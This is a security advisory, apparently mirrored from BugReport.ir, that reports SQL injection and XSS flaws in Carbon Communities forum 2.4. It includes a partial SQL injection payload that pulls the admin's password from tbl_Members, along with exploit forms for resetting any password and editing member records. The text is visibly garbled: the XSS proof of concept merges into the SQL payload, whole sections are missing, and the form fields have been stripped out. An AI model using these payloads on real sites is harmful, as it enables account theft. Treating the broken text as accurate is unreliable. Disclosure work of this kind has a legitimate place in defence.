TUCoPS :: HP Unsorted C :: bx2825.htm

Carbon Communities forum Multiple Vulnerabilities.
Carbon Communities forum Multiple Vulnerabilities.
Carbon Communities forum Multiple Vulnerabilities.


########################## www.BugReport.ir #######################################
#
#      AmnPardaz Security Research Team
#
# Title: Multiple Vulnerabilities in Carbon Communities forum.
# Vendor: www.carboncommunities.com
# Vulnerable Version: 2.4 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/35
###################################################################################


####################
1. Description:
####################
Carbon Communities is a high powered, fully scalable, and highly customizable online portal, message boards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software rolled into one.

####################
2. Vulnerability:
####################
        2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain usernames and passwords.
                2.1.1. POC:
                                Check exploits section.
        2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any password to his/her email address.(exploit available)
                2.2.1. POC:
                                Check exploits section.
        2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member info.(exploit available)
                2.3.1. POC:
                                Check exploits section.
        2.4. There are some XSS in "login.asp" and "member_send.asp".
                2.4.1. POC:
                                /login.asp?Redirect='>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name = 'admin'
        -------------
 3.2. Attacker can send any password to his/her email address:
        -------------
                

action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post" onsubmit="check()">
                UserName: 
                

                EMail: 
                

                
                

        -------------
 3.3. Attacker can update member info.:
        -------------

action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit" method="post">
                ID
                

                Member_Cookies
                

                Member_SystemCookies
                

                Member_Center
                

                Member_EmailTheadResponse
                

                Member_EmailPostResponse
                

                Member_WeekStart
                

                Member_ThreadDays
                

                Member_ThreadView
                

                Member_Invisible
                

                Member_HiddenEmail
                

                Member_ReceivePM
                

                Member_PMEmailNotice
                

                Member_PMPopup
                

                Member_Newsletter
                

                Member_TimeZone
                

                Member_DefaultColor
                

                
                

        -------------
####################
4. Solution:
####################
        Edit the source code to ensure that inputs are properly sanitised.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH